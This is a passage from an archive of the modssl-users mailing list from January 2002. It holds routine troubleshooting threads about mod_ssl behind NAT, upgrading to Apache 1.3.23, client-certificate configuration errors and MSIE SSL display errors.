modssl-users We have an apache server with mod_ssl. The SSL connection works fine within out network(intranet). But from outside(internet), users reach the apache server through NAT. They are able to see the http page but are not able to see https page. The apache server's ip address is not visible to outside users since the NAT does the network address translation. The external users use an external ip address which is redirected to apache ip address by NAT. The following Virtual Host directive is used in the apache httpd.conf SSLMutex sem SSLRandomSeed startup builtin SSLSessionCache none SSLEngine On SSLCertificateFile conf/ssl/apache-server.cert SSLCertificateKeyFile conf/ssl/apache-server.key Any help would be highly appreciated _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 27 03:39:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA29077; Sun, 27 Jan 2002 03:38:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA29057; Sun, 27 Jan 2002 03:37:41 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 889A04CE748; Sat, 26 Jan 2002 20:52:14 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0QJVEc25823; Sat, 26 Jan 2002 20:31:14 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id RAA00325; Sat, 26 Jan 2002 17:24:13 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 26 Jan 2002 07:26:19 -0800 Received: from 204.115.33.45 by lw7fd.law7.hotmail.msn.com with HTTP; Sat, 26 Jan 2002 15:26:16 GMT X-Originating-IP: [204.115.33.45] From: "Jim Lee" To: modssl-users@modssl.org Subject: MOD SSL over NAT Date: Sat, 26 Jan 2002 15:26:16 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 26 Jan 2002 15:26:19.0572 (UTC) FILETIME=[CDB9E740:01C1A67D] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jim Lee" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users We have an apache server with mod_ssl. The SSL works fine within our network(intranet). But for internet users, who access the apache server over NAT, the SSL does not work. Is there any modification that needs to the made in the apache httpd. conf file? Comments, Suggestions would be helpful. Thanks, -Jim _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 27 05:12:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA03388; Sun, 27 Jan 2002 05:11:39 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bubblehouse.divisionbyzero.com id FAA03372; Sun, 27 Jan 2002 05:10:59 +0100 (MET) Received: from valium.germtop.com (valium.germtop.com [64.81.68.235]) by bubblehouse.divisionbyzero.com (Postfix) with ESMTP id CC3AF5BD86 for ; Sat, 26 Jan 2002 21:21:08 -0800 (PST) Subject: Re: MOD SSL over NAT From: jon To: modssl-users@modssl.org In-Reply-To: References: Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-zCkTbAC2dE5cya5ft1IX" X-Mailer: Evolution/1.0.1 Date: 26 Jan 2002 20:10:44 -0800 Message-Id: <1012104644.28183.29.camel@valium.germtop.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-zCkTbAC2dE5cya5ft1IX Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Sat, 2002-01-26 at 07:26, Jim Lee wrote: > We have an apache server with mod_ssl. > The SSL works fine within our network(intranet). > But for internet users, who access the apache server over NAT, the SSL do= es=20 > not work. are you sure your nat setup is allowing traffic on port 443 (or whatever port your ssl is running on)? try telneting to port 443 on the external interface from someplace outside the firewall; if you can't you need to reconfigure your firewall.. -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus? www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-zCkTbAC2dE5cya5ft1IX Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8U33Ewj1gFegse14RAoDoAJ4vK5iOcRyYlt17jPn8As6N69aCawCdF2ib Oaj04sN6eEM5kvfUmjmbj+g= =y2yp -----END PGP SIGNATURE----- --=-zCkTbAC2dE5cya5ft1IX-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 27 19:33:27 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA28091; Sun, 27 Jan 2002 19:22:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id TAA27907; Sun, 27 Jan 2002 19:20:51 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sun, 27 Jan 2002 09:48:40 -0800 Received: from 172.146.107.243 by lw7fd.law7.hotmail.msn.com with HTTP; Sun, 27 Jan 2002 17:48:40 GMT X-Originating-IP: [172.146.107.243] From: "Jim Lee" To: modssl-users@modssl.org Subject: Re: MOD SSL over NAT Date: Sun, 27 Jan 2002 17:48:40 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 27 Jan 2002 17:48:40.0851 (UTC) FILETIME=[DB236630:01C1A75A] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jim Lee" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Response to Response: Yes, the Firewall is configured to allow port 443. In fact we are able to reach our web server from outside(internet) by typing in the following url. http://www.website.com:443 But the moment we try the following url, it fails https://www.website.com The same above steps works successfully from within out network(intranet) without any problems. Both http and https work fine. Any clues would be higly appreciated. Original Posting: On Sat, 2002-01-26 at 07:26, Jim Lee wrote: We have an apache server with mod_ssl. The SSL works fine within our network(intranet). But for internet users, who access the apache server over NAT, the SSL does not work. Response to Posting: are you sure your nat setup is allowing traffic on port 443 (or whatever port your ssl is running on)? try telneting to port 443 on the external interface from someplace outside the firewall; if you can't you need to reconfigure your firewall.. -jon _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 00:44:33 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA01598; Sun, 27 Jan 2002 19:55:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ip9.elmar.co.il id TAA01445; Sun, 27 Jan 2002 19:53:26 +0100 (MET) Received: from netmask.it (ip9.elmar.co.il [192.168.1.9]) by ip9.elmar.co.il (8.11.6/8.11.6) with ESMTP id g0RKrKX03408 for ; Sun, 27 Jan 2002 22:53:20 +0200 Message-ID: <3C5468C0.82830B22@netmask.it> Date: Sun, 27 Jan 2002 22:53:20 +0200 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: MOD SSL over NAT References: Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Jim Lee wrote: > Response to Response: > Yes, the Firewall is configured to allow port 443. > > In fact we are able to reach our web server from outside(internet) by typing > in the following url. > > http://www.website.com:443 > > But the moment we try the following url, it fails > > https://www.website.com > > The same above steps works successfully from within out network(intranet) > without any problems. Both http and https work fine. > > Any clues would be higly appreciated. > > Original Posting: > On Sat, 2002-01-26 at 07:26, Jim Lee wrote: > We have an apache server with mod_ssl. > The SSL works fine within our network(intranet). > But for internet users, who access the apache server over NAT, the SSL does > not work. > > Response to Posting: > are you sure your nat setup is allowing traffic on port 443 (or whatever > port your ssl is running on)? try telneting to port 443 on the external > interface from someplace outside the firewall; if you can't you need to > reconfigure your firewall.. I had the same problem, and it resolved when I added an appropriate iptables rule with the flags: -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu I was told to add this rule by others who had the same problem too with SSL connections. I can't promise you that the problem is the same, nor that such a rule will end your troubles (and I even don't know if your firewall is based on iptables); I just tell from my experience. By the way: If this is the cuase of the problem, then most of the problems will be with SSL, but not only: a lack of such a rule, when there are conflicting MTU's, may have other effects. -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 01:11:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA00107; Mon, 28 Jan 2002 01:10:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id BAA00033; Mon, 28 Jan 2002 01:09:14 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16UvCR-0000IW-00 for ; Sun, 27 Jan 2002 11:42:47 -0800 Date: Sun, 27 Jan 2002 11:42:47 -0800 To: modssl-users@modssl.org Subject: Re: MOD SSL over NAT Message-ID: <20020127194247.GB32060@squaretrade.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users you will need separate VirtualHost sections for both port 80 and port 443: example (not real): NameVirtualHost 10.10.10.10 Servername my.server.com DocumentRoot /path/to/docs ServerName my.server.com DocumentRoot /path/to/htdocs ServerAdmin foo@server.com (etc...) On Sun, Jan 27, 2002 at 05:48:40PM +0000, Jim Lee wrote: > Response to Response: > Yes, the Firewall is configured to allow port 443. > > In fact we are able to reach our web server from outside(internet) by > typing in the following url. > > http://www.website.com:443 > > But the moment we try the following url, it fails > > https://www.website.com > > The same above steps works successfully from within out network(intranet) > without any problems. Both http and https work fine. > > Any clues would be higly appreciated. > > > > Original Posting: > On Sat, 2002-01-26 at 07:26, Jim Lee wrote: > We have an apache server with mod_ssl. > The SSL works fine within our network(intranet). > But for internet users, who access the apache server over NAT, the SSL does > not work. > > > > Response to Posting: > are you sure your nat setup is allowing traffic on port 443 (or whatever > port your ssl is running on)? try telneting to port 443 on the external > interface from someplace outside the firewall; if you can't you need to > reconfigure your firewall.. > -jon > > > > > _________________________________________________________________ > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 03:23:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA05901; Mon, 28 Jan 2002 03:22:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from toms.net id DAA05887; Mon, 28 Jan 2002 03:22:05 +0100 (MET) Received: from Toms.NET (Toms.NET [64.149.228.95]) by toms.net (8.12.1/8.12.1) with ESMTP id g0S2M3K3031397 for ; Sun, 27 Jan 2002 21:22:04 -0500 Date: Sun, 27 Jan 2002 21:22:03 -0500 (EST) From: Tom Oehser To: modssl-users@modssl.org Subject: ??? 1.3.23 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Tom Oehser X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Is there a procedure that is known to be worth attempting to put a modssl-X onto an apache-X+1? Is there any intention or plan of releasing it within X days of the apache release? Is there any documentation of what is involved in doing it myself? I saw mention of people having done it successfully... Without details... I thought I could just get the CVS for modssl and figure it out, but the CVS source doesn't seem designed to be portably built, for example, the scripts look for perl in /sw/bin/perl, which must work on at least .01% of installed *nix systems... the other target fails because it expects a pgp key in a place I don't have one... there is a README file, but... And, the mod_ssl I get from CVS is for 1.3.20, which is *less* than the one that is downloadable already built for 1.3.22, shooting holes in my initial theory that going to the CVS was even getting me closer to now... -Tom ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 03:43:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA06592; Mon, 28 Jan 2002 03:42:49 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from wm4.163.com id DAA06533; Mon, 28 Jan 2002 03:41:22 +0100 (MET) Received: by wm4.163.com (Postfix, from userid 60001) id 594941CD699E3; Mon, 28 Jan 2002 10:41:17 +0800 (CST) MIME-Version: 1.0 Message-ID: <3C54BA4D.000027.28355@bj221.163.com> Date: Mon, 28 Jan 2002 10:41:17 +0800 (CST) From: "zhongduhang" To: modssl-users@modssl.org Subject: =?gb2312?B?dW5hYmxlIHRvIGNvbmZpZ3VyZSB0aGUgY2xpZW50IGF1dGhlbnRpY2F0aW9uLHdoeT8=?= X-Priority: 3 X-Originating-IP: [61.187.56.11] X-Mailer: Coremail2.0 Copyright Tebie Ltd., 2001 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "zhongduhang" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear all: I have installed apache+mod_ssl+openssl on the windows 2000,and I also create the server cert and key,and the apache with openssl can works well. but when I want to configure the client authentication,it can not start. my configure looks like: SSLMutex sem SSLRandomSeed startup builtin SSLSessionCache none SSLLog logs/SSL.log SSLLogLevel debug SSLVerifyClient requie SSLVerifyDepth 2 SSLCACertificateFile conf/ssl/cacert.der SSLEngine On SSLCertificateFile conf/ssl/server.der #cert SSLCertificateKeyFile conf/ssl/server2.key ============================================================= http://news.163.com/editor/etalk.html ÍøÑÔÒ×ÓÆß×ì°ËÉà´ó¼Ò˵ http://love.163.com ´ºÌ컨»á¿ª£¬Äк¢Å®º¢ÒªÁµ°®¡« http://vip.163.com ÍøÒ×VIPÓÊÏä 30ÃëÁ¢µÃ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 03:48:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA06856; Mon, 28 Jan 2002 03:47:05 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from wm4.163.com id DAA06673; Mon, 28 Jan 2002 03:44:24 +0100 (MET) Received: by wm4.163.com (Postfix, from userid 60001) id 064761D660F6A; Mon, 28 Jan 2002 10:44:22 +0800 (CST) MIME-Version: 1.0 Message-ID: <3C54BB05.00000A.28629@bj221.163.com> Date: Mon, 28 Jan 2002 10:44:21 +0800 (CST) From: "zhongduhang" To: modssl-users@modssl.org Subject: =?gb2312?B?dW5hYmxlIHRvIGNvbmZpZ3VyZSB0aGUgY2xpZW50IGF1dGhlbnRpY2F0aW9uLHdoeT8=?= X-Priority: 3 X-Originating-IP: [61.187.56.11] X-Mailer: Coremail2.0 Copyright Tebie Ltd., 2001 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "zhongduhang" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear all: I have installed apache+mod_ssl+openssl on the windows 2000,and I also create the server cert and key,and the apache with openssl can works well. but when I want to configure the client authentication,it can not start. my configure looks like: SSLMutex sem SSLRandomSeed startup builtin SSLSessionCache none SSLLog logs/SSL.log SSLLogLevel debug SSLVerifyClient requie SSLVerifyDepth 2 SSLCACertificateFile conf/ssl/cacert.der SSLEngine On SSLCertificateFile conf/ssl/server.der SSLCertificateKeyFile conf/ssl/server2.key and when I look the error log ,the ssl.log looks like: Init: Generating temporary RSA private keys (512/1024 bits) Init: Configuring temporary DH parameters (512/1024 bits) Init: Seeding PRNG with 136 bytes of entropy Init: Configuring temporary RSA private keys (512/1024 bits) Init: Configuring temporary DH parameters (512/1024 bits) Init: Initializing (virtual) servers for SSL Init: Configuring server bigworm:443 for SSL protocol Init: (bigworm:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) Init: (bigworm:443) Configuring client authentication [error] Init: (bigworm:443) Unable to configure verify locations for client authentication ============================================================= http://news.163.com/editor/etalk.html ÍøÑÔÒ×ÓÆß×ì°ËÉà´ó¼Ò˵ http://love.163.com ´ºÌ컨»á¿ª£¬Äк¢Å®º¢ÒªÁµ°®¡« http://vip.163.com ÍøÒ×VIPÓÊÏä 30ÃëÁ¢µÃ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 07:10:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA24550; Mon, 28 Jan 2002 07:09:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from toms.net id HAA24538; Mon, 28 Jan 2002 07:08:47 +0100 (MET) Received: from Toms.NET (Toms.NET [64.149.228.95]) by toms.net (8.12.1/8.12.1) with ESMTP id g0S31ZK3003058 for ; Sun, 27 Jan 2002 22:01:36 -0500 Date: Sun, 27 Jan 2002 22:01:35 -0500 (EST) From: Tom Oehser To: modssl-users@modssl.org Subject: Re: ??? 1.3.23 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Tom Oehser X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users P.S. I found the documentation on how to upgrade *modssl* later, using apxs. But that method doesn't seem to apply to upgrading *apache*... -Tom ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 07:19:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA25262; Mon, 28 Jan 2002 07:18:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id HAA25031; Mon, 28 Jan 2002 07:16:05 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 37AE74CE541; Mon, 28 Jan 2002 07:16:04 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0S6FBe13369; Mon, 28 Jan 2002 07:15:11 +0100 (CET) Date: Mon, 28 Jan 2002 07:15:11 +0100 From: "Ralf S. Engelschall" To: modssl-users@modssl.org Subject: Re: ??? 1.3.23 Message-ID: <20020128061511.GA13221@engelschall.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.24i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: https://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, Jan 27, 2002, Tom Oehser wrote: > [...] > And, the mod_ssl I get from CVS is for 1.3.20, which is *less* than the > one that is downloadable already built for 1.3.22, shooting holes in my > initial theory that going to the CVS was even getting me closer to now... Ops, my fault. The rsync cronjob was broken which updated the CVS copy from my master machine. Now fixed. For Apache 1.3.23: Expect an mod_ssl update for 1.3.23 within the next days. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 07:21:59 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA25471; Mon, 28 Jan 2002 07:20:48 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id HAA25362; Mon, 28 Jan 2002 07:20:04 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g0S6JAm03532 for ; Mon, 28 Jan 2002 01:19:10 -0500 Date: Mon, 28 Jan 2002 01:19:10 -0500 (EST) From: Cliff Woolley X-X-Sender: To: Subject: Re: ??? 1.3.23 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, 27 Jan 2002, Tom Oehser wrote: > I found the documentation on how to upgrade *modssl* later, using apxs. > But that method doesn't seem to apply to upgrading *apache*... The short answer is that while it *can* be done, it's a very manual process and it's highly prone to mistakes. If you insist on doing it by hand, there's a flag you can give to mod_ssl's configure to force it to try to apply itself to a version it wasn't designed to work with (--force), but don't be surprised if you get patching errors and have to manually tweak the Apache source afterward to get it to (a) compile and (b) run correctly. The safest bet by far is to just wait on the new version of mod_ssl to be released. --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 11:26:38 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA06979; Mon, 28 Jan 2002 11:25:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from area.alsernet.es id LAA06964; Mon, 28 Jan 2002 11:25:04 +0100 (MET) Received: from cinos1.grupoalser.com (213-96-224-53.uc.nombres.ttd.es [213.96.224.53]) by area.alsernet.es (Postfix) with ESMTP id 4B03BC6D57 for ; Mon, 28 Jan 2002 11:27:42 +0100 (CET) Date: Mon, 28 Jan 2002 11:25:03 +0100 From: Administrador X-Mailer: The Bat! (v1.53d) Organization: Alsernet 2000 X-Priority: 3 (Normal) Message-ID: <38265193047.20020128112503@alsernet.es> To: modssl-users@modssl.org Subject: New mod_ssl user MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Administrador X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello to all, I'm installing Apache 1.3.23. Can I use mod_ssl for Apache 1.3.22? Thanks in advance. -- Administrador Técnico Alsernet 2000 http://www.alsernet.es ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 18:39:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA00159; Mon, 28 Jan 2002 18:38:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ahmler1.mail.eds.com id SAA00142; Mon, 28 Jan 2002 18:38:12 +0100 (MET) Received: from ahmlir1.mail.eds.com (ahmlir1-2.mail.eds.com [192.85.154.25]) by ahmler1.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0SHc6P17843 for ; Mon, 28 Jan 2002 12:38:07 -0500 Received: from ahmlir1.mail.eds.com (localhost [127.0.0.1]) by ahmlir1.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0SHc0L23582 for ; Mon, 28 Jan 2002 12:38:02 -0500 (EST) Received: from usahm001.examhub.exch.eds.com (usahm001.examhub.exch.eds.com [207.37.138.140]) by ahmlir1.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0SHbtb23458 for ; Mon, 28 Jan 2002 12:37:57 -0500 (EST) Received: by usahm001.examhub.exch.eds.com with Internet Mail Service (5.5.2655.51) id ; Mon, 28 Jan 2002 12:37:53 -0500 Message-ID: <8A87A19E6153D4119FA800508BDF0932E0E2C3@USHEM202> From: "Kuczborski, Carol L" To: "'modssl-users@modssl.org'" Subject: RE: MSIE + "The page cannot be displayed" error Date: Mon, 28 Jan 2002 12:37:52 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.51) Content-Type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kuczborski, Carol L" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I had the problem with most all versions of IE (5.0, 5.5, and 6.0), but not Netscape (4.75, 4.76, and 6). I received the "Page cannot be displayed" and "Cannot find server or DNS error" messages. I was running Apache and mod_ssl as packaged with the Oracle9i Application Server (1.0.2.2) on a Windows NT 4.0 platform. I did not completely eliminate the errors, but reduced them quite significantly by making the following changes: 1. Modified httpd.conf as follows: SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown 2. Oracle Worldwide Support patched the ApacheModuleSSL.dll file. The patch to ApacheModuleSSL.dll implements a workaround in the code for reading from a socket for WIN32. According to the details for the ApacheModuleSSL.dll patch, there was mention of a bug in the "select" function in Windows NT 4.0: "When checking a socket, if data can be read without blocking, select () returns yes, but when actually reading from the socket with recv(), that function returns WSAEWOULDBLOCK, which says that reading would block. It seems that this problem does not occur in usual operation, but only in an SSL enabled Apache (modssl or apache-ssl) with https. The code for WIN32, which handles writing to a socket, already contains a workaround for this. The code for reading from a socket did not have a workaround." Basically, they added a retry loop so that if a read from the socket failed, it tried the read again. Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com -----Original Message----- From: Julian C. Dunn [mailto:jdunn@verticalscope.com] Sent: Friday, January 18, 2002 11:25 AM To: modssl-users@modssl.org Subject: RE: MSIE + "The page cannot be displayed" error I am wondering if someone is keeping a list of working versus non-working versions of IE, and if not, whether one could be started. I am running into this issue as well, and my support department keeps harrassing me to come up with better solutions to tell the users other than "Use Netscape". Thank you Christopher for providing a non-working version number; does anyone know of a version # of IE which does work reliably? - Julian On 18-Jan-2002 Christopher Taranto wrote: > Fortunately (for my sanity), I have one of non-working versions of the MSIE > browsers (5.00.2614.3500) on one of the machines in my office so I can > repeatedly create the errors. -- Julian C. Dunn, B.A.Sc. Senior Software Developer, VerticalScope Inc. 111 Peter St., Suite 700, Toronto, ON Tel: (416) 341-8950 x236 Fax: (416) 341-8959 istream >> ostream >> "We all scream for ice cream"; ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 19:03:41 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA01105; Mon, 28 Jan 2002 19:02:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA01039; Mon, 28 Jan 2002 19:00:45 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 122D84CE74C; Mon, 28 Jan 2002 19:00:42 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0SGhgQ21239; Mon, 28 Jan 2002 17:43:42 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from va9uxmail.dyncorp.com id QAA21586; Mon, 28 Jan 2002 16:06:48 +0100 (MET) Received: from va9nt1.dyncorp.com (va9nt1.dyncorp.com [172.18.252.252]) by va9uxmail.dyncorp.com (8.9.3/8.9.3) with ESMTP id KAA09217 for ; Mon, 28 Jan 2002 